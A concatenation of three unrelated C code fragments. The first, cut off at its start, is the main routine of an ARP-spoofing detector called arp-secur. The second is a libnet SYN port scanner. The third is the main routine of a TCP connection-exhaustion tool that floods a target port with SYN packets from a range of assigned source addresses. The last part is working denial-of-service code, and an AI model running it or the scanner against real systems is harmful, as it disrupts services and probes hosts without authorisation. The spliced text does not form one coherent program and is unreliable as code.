config->a_scan_type = "TSTAMP_SCAN"; break; case 'v': config->verbose = 1; break; case 'g': if (1 <= atoi (optarg) && 9 >= atoi (optarg)) { config->gtimeout = atoi (optarg); } break; case 'o': showpopup = 1; break; case '?': if ('i' == optopt || 'p' == optopt) { print_usage (); exit (EXIT_FAILURE); } else if (isprint (optopt)) { printf ("\n [-] unknown option `-%c'\n", optopt); print_usage (); exit (EXIT_FAILURE); } else { printf ("\n unknown option character `\\x%x'\n", optopt); print_usage (); exit (EXIT_FAILURE); } default: print_usage (); exit (EXIT_FAILURE); } } if (0 == flags) { config->flags = SYN; } else if (ACK == flags) { config->a_scan_type = "ACK_SCAN"; } else if (RST == flags) { config->a_scan_type = "RST_SCAN"; } else if (SYN == flags) { config->a_scan_type = "SYN_SCAN"; } else if (FIN == flags) { config->a_scan_type = "FIN_SCAN"; } /* print an ASCII-ART banner */ print_banner (); switch (config->dport) { case HTTP: config->a_port_name = "HTTP"; break; case FTP: config->a_port_name = "FTP"; break; case TELNET: config->a_port_name = "TELNET"; break; case SSH: config->a_port_name = "SSH"; break; case SMTP: config->a_port_name = "SMTP"; break; default: config->a_port_name = "UNKNOWN"; break; } /* check if we are root, else exit */ if (0 != getuid ()) { printf ("\n [!] you need to be root buddy...\n\n"); exit (EXIT_FAILURE); } /* find a capture device if not specified on command-line */ if (config->dev == NULL) { config->dev = pcap_lookupdev (errbuf); if (config->dev == NULL) { printf ("\n [-] could not find default device: %s\n\n", errbuf); exit (EXIT_FAILURE); } } /* initialize libnet library to find local mac and ip addresses */ l = libnet_init (LIBNET_LINK, config->dev, libnet_errbuf); if (NULL == l) { printf ("\n [-] libnet_init() failed: %s\n\n", libnet_errbuf); exit (EXIT_FAILURE); } /* fetch local mac address */ config->macaddr = libnet_get_hwaddr (l); if (NULL == config->macaddr) { printf ("\n [-] could not fetch local mac address: %s\n\n", libnet_geterror (l)); libnet_destroy (l); exit (EXIT_FAILURE); } else { snprintf (config->llmac, 18, "%02x:%02x:%02x:%02x:%02x:%02x", config->macaddr->ether_addr_octet[0], config->macaddr->ether_addr_octet[1], config->macaddr->ether_addr_octet[2], config->macaddr->ether_addr_octet[3], config->macaddr->ether_addr_octet[4], config->macaddr->ether_addr_octet[5]); } /* fetch local ip address */ config->ipaddr = libnet_get_ipaddr4 (l); if (-1 == config->ipaddr) { printf ("\n [-] could not fetch local ip address: %s\n\n", libnet_geterror (l)); libnet_destroy (l); exit (EXIT_FAILURE); } else { snprintf (config->llip, 16, "%s", libnet_addr2name4 (config->ipaddr, LIBNET_DONT_RESOLVE)); } printf (" [+] session started at %s \n", start_time); printf (" [+] default configuration and cmd-line parameters loaded\n"); printf (" [+] device: \"%s\", mode: \"%s\", port: \"%s\", scan-type: \"%s\"\n", config->dev, (config->mode)? "PREVENT" : "DETECT", config->a_port_name, config->a_scan_type); /* start repeat loop */ /* call sniffer module to fill up our config struct with packet fields */ printf (" [+] calling arp-sniffer module to capture incoming arp packets\n"); config = sniffer (config); printf ("\n [+] above arp packet was captured and respective fields were saved for analysis\n"); printf (" [+] calling anamoly-detection module to perform static analysis on saved packet fields\n"); /* call static_analysis module to perform some static checks on packet fields */ valid = static_analysis (conf); if (EXIT_FAILURE == valid) { printf (" [+] analyzed arp packet seems to be specially-crafted. kernel might have added the" " poisonous SIP-SMAC entry in arp cache\n"); if (DETECT == conf.mode) { printf (" [+] you need to clean up arp cache manually. delete entry for SIP (%s) - SMAC (%s)\n", conf.a_sip, conf.a_sha); printf (" [+] to automate this process, please terminate this session and restart arp-secur" " in PREVENT mode, i.e with -P switch\n"); } else if (PREVENT == conf.mode) { printf (" [+] cleaning up arp cache by deleting entry for SIP (%s) - SMAC (%s)\n", conf.a_sip, conf.a_sha); cache_cleanup (conf.a_sip, conf.a_sha); } } else { printf (" [+] analyzed arp packet does not seem to be specially-crafted\n"); /* check if we have already processed (and validated) the ip-mac pair... */ if (0 < conf.queue_size) { printf (" [+] calling known-traffic-filter module to check if we have validated" " IP - MAC (%s - %s) pair earlier (queue_size: %d)\n", conf.a_sip, conf.a_sha, conf.queue_size); known_traffic_filter (start, conf.a_sip, conf.a_sha, conf.queue_size); } else { printf (" [+] no IP-MAC pairs have been validated yet (queue_size: %d)\n", conf.queue_size); } /* ...hmmm, seems to be a new mac-ip pair. let's validate it then... */ printf (" [+] calling spoof-detection module to validate IP - MAC (%s - %s) pair\n", conf.a_sip, conf.a_sha); valid = spoof_detector (conf, start, end); if (0 == valid) { printf ("\n [+] try other scan types before determining the validity of the IP - MAC (%s - %s)\n", conf.a_sip, conf.a_sha); if (DETECT == conf.mode) { printf (" [+] for safety reasons, you need to clean up arp cache manually." " delete entry for (%s - %s)\n", conf.a_sip, conf.a_sha); printf (" [+] to automate this process from now onwards," " restart arp-secur in PREVENT mode, i.e with -P switch\n"); } else if (PREVENT == conf.mode) { printf (" [+] cleaning up arp cache by deleting entry for SIP (%s) - SMAC (%s)\n", conf.a_sip, conf.a_sha); cache_cleanup (conf.a_sip, conf.a_sha); } } /* display session summary in a system popup notification */ if (1 == showpopup) { alert (conf.a_sip, conf.a_sha, valid); } /* end repeat loop */ /* end arp-secur session */ bcurtime = time (NULL); bloctime = localtime (&bcurtime); strftime (end_time, 24, "%d/%b/%Y %H:%M:%S", bloctime); printf ("\n [+] session finished at %s\n\n", end_time); } return 0; }//main
void sendsyns () { libnet_t *l; char errbuf[LIBNET_ERRBUF_SIZE]; u_long ip; libnet_ptag_t tcp_pkt = LIBNET_PTAG_INITIALIZER; libnet_ptag_t ip_pkt; u_long dst_ip; int count = 0; char *payload = ""; // put your love note here. u_short payload_s = strlen (payload); int currentport = opts.low_port; int build_header = 1; /* * pcap may be slow to initialize, so let's wait a second. */ sleep (1); /* * initialize libnet for raw IP packets. libnet will * find an appropriate interface. */ l = libnet_init (LIBNET_RAW4, NULL, errbuf); if (l == NULL) { fprintf (stderr, "libnet_init failed: %s", errbuf); exit (1); } /* * get the IP address of the source interface */ ip = libnet_get_ipaddr4 (l); if (-1 == ip) { fprintf (stderr, "libnet_get_ipaddr4(l) failed: "); fprintf (stderr, "%s\n", libnet_geterror (l)); exit (1); } dst_ip = libnet_name2addr4 (l, (u_char *) opts.target, LIBNET_RESOLVE); if (-1 == dst_ip) { fprintf (stderr, "libnet_name2addr4() failed: "); fprintf (stderr, "%s\n", libnet_geterror (l)); exit (1); } /* * Build and send a SYN packet, one for each port. The first time * this loop is executed an IP packet will be constructed. */ printf ("scanning port %d through %d on %s\n", opts.low_port, opts.high_port, libnet_addr2name4 (dst_ip, LIBNET_DONT_RESOLVE)); while (currentport <= opts.high_port) { /* * Sleep a little... if we send packets too fast, some will get * dropped. */ usleep (50); /* * Build the TCP packet with the SYN flag set. A payload is * optional; for automated scans it is nice to include some text * explaining why you are scanning (or ask first!). Fields with * 0 will be calculated by libnet. */ tcp_pkt = libnet_build_tcp (opts.src_port, // source port currentport++, // dest port libnet_get_prand (LIBNET_PRu32), // seq libnet_get_prand (LIBNET_PRu32), // ack TH_SYN, // flags libnet_get_prand (LIBNET_PRu16), // window size 0, // checksum 0, // urgent ptr LIBNET_TCP_H + payload_s, // packet size (u_char *) payload, // contents of packet payload_s, // size of payload l, // libnet handle tcp_pkt); // libnet id if (-1 == tcp_pkt) { fprintf (stderr, "libnet_build_tcp() failed: "); fprintf (stderr, "%s\n", libnet_geterror (l)); exit (1); } if (build_header) { build_header = 0; ip_pkt = libnet_autobuild_ipv4 (LIBNET_IPV4_H + LIBNET_TCP_H, IPPROTO_TCP, dst_ip, l); if (-1 == ip_pkt) { fprintf (stderr, "libnet_autobuild_ipv4() failed: "); fprintf (stderr, "%s\n", libnet_geterror (l)); } } /* * Send it! */ count = libnet_write (l); if (-1 == count) { fprintf (stderr, "libnet_write() failed: "); fprintf (stderr, "%s\n", libnet_geterror (l)); } } printf ("\n"); }
int main(int argc, char *argv[]) { pkt_t *dp = NULL; int ch = 0; u_int32_t count = 5; u_int32_t group = 0; /* number of packets to send in group */ useconds_t usec = 0; /* rate limit number of SYN's sent */ pid_t pid = 0; /* pcap */ pcap_t *p = NULL; char *dev = NULL; char errbuf[PCAP_ERRBUF_SIZE]; u_int32_t localnet = 0; u_int32_t netmask = 0; struct bpf_program fcode; char *filt = NULL; /* libnet */ char lerrbuf[LIBNET_ERRBUF_SIZE]; (void)memset(errbuf, 0, PCAP_ERRBUF_SIZE); (void)memset(lerrbuf, 0, LIBNET_ERRBUF_SIZE); ISNULL(filt = (char *)calloc(MAXFILT, 1)); ISNULL(dp = (pkt_t *)calloc(1, sizeof(pkt_t))); dp->p_tcp = LIBNET_PTAG_INITIALIZER; dp->p_ip = LIBNET_PTAG_INITIALIZER; dp->winsize = TCP_WINSIZE; dp->opts |= O_CHKISN; /* check the ISN return in the ACK by default */ drench_exit = 0; /* global, signal exit from loop */ while ( (ch = getopt(argc, argv, "ACc:d:hi:p:P:Rr:s:S:x:")) != EOF) { switch (ch) { case 'A': /* Continue ACK'ing all ACK's */ dp->opts |= O_ACK; break; case 'C': /* Don't check the returned sequence number in the ACK */ dp->opts ^= O_CHKISN; break; case 'c': /* Number of packets to send */ count = (u_int32_t)atoi(optarg); break; case 'd': /* Destination address */ dp->daddr = optarg; break; case 'h': /* Help */ usage(); break; case 'i': /* Use interface */ dev = optarg; break; case 'p': /* Destination port */ dp->dport = (in_port_t)atoi(optarg); break; case 'P': dp->payload = optarg; /* Send data with the ACK */ break; case 'r': /* Range of ip's to allocate */ dp->range = (u_int8_t)atoi(optarg); break; case 'R': /* Repeat the scan */ dp->opts |= O_REPEAT; break; case 's': /* Source address */ dp->saddr = strdup(optarg); break; case 'S': /* Sleep (microseconds) */ usec = (useconds_t)atoi(optarg); break; case 'x': /* Number of packets to send in group */ group = (u_int32_t)atoi(optarg); break; default: usage(); break; } } if (dp->daddr == NULL) { (void)fprintf(stderr, "Must specify destination address.\n"); usage(); } if (dp->dport == 0) { (void)fprintf(stderr, "Must specify destination port.\n"); usage(); } if (dp->range == 0) dp->range = 1; if (group == 0) group = dp->range; if (dev == NULL) PCAP_ERRBUF(dev = pcap_lookupdev(errbuf)); /* libnet */ dp->l = libnet_init(LIBNET_RAW4, dev, lerrbuf); if (dp->l == NULL) errx(EXIT_FAILURE, "libnet_init: %s", lerrbuf); if (dp->saddr == NULL) { u_int32_t ipaddr = 0; /* Assign the inital address. */ /* FIXME Simplisitically assign the address from * FIXME our current address. Note this breaks for many * FIXME conditions: if the host is multi-homed, if * FIXME another host exists on the network with that IP, * FIXME if the final octet rolls past 254, if the network * FIXME is classless, IP aliases ... * * FIXME We can check for these conditions (check the ARP * FIXME table, etc), but it is error prone. So just * FIXME warn the user and hope for the best. */ if ( (ipaddr = libnet_get_ipaddr4(dp->l)) == -1) errx(EXIT_FAILURE, "%s", libnet_geterror(dp->l)); dp->saddr = strdup(libnet_addr2name4(ipaddr, LIBNET_DONT_RESOLVE)); (void)fprintf(stdout, "[%s] WARNING: Source address not assigned.\n", __progname); } if (dp->range > 1) { (void)fprintf(stdout, "[%s] WARNING: Assigning addresses sequentially from %s.\n", __progname, dp->saddr); (void)fprintf(stdout, "[%s] WARNING: This may cause problems on your network if addresses conflict with other hosts!\n", __progname); } LIBNET_ERR(libnet_seed_prand(dp->l)); dp->secret = libnet_get_prand(LIBNET_PRu32); /* pcap */ (void)fprintf(stdout, "[%s] Connection exhaustion started.\n", __progname); (void)fprintf(stdout, "[%s] Using device: %s\n", __progname, dev); (void)snprintf(filt, MAXFILT, PCAP_FILT, dp->daddr, dp->dport); (void)fprintf(stdout, "[%s] Using filter: %s\n", __progname, filt); PCAP_ERRBUF(p = pcap_open_live(dev, SNAPLEN, PROMISC, TIMEOUT, errbuf)); if (pcap_lookupnet(dev, &localnet, &netmask, errbuf) == -1) errx(EXIT_FAILURE, "%s\n", errbuf); PCAP_ERR(pcap_compile(p, &fcode, filt, 1 /* optimize == true */, netmask)); PCAP_ERR(pcap_setfilter(p, &fcode)); switch (pcap_datalink(p)) { case DLT_IEEE802_11: (void)fprintf(stderr, "[%s] Link layer is 802.11\n", __progname); break; case DLT_EN10MB: (void)fprintf(stderr, "[%s] Link layer is ethernet\n", __progname); break; default: (void)fprintf(stderr, "[%s] Link layer is unsupported\n", __progname); break; } if (create_arp_pool1(dp) < 0) warnx("Could not create ARP pool"); (void)signal(SIGHUP, drench_cleanup); (void)signal(SIGQUIT, drench_cleanup); (void)signal(SIGINT, drench_cleanup); (void)signal(SIGTERM, drench_cleanup); if ( (pid = fork()) == -1) err(EXIT_FAILURE, "fork"); /* begin by sending SYN packets */ if (pid == 0) drench_writer(dp, count, group, usec); drench_reader(dp, p); (void)destroy_arp_pool1(dp); libnet_destroy(dp->l); free(dp->saddr); free(dp); exit (EXIT_FAILURE); }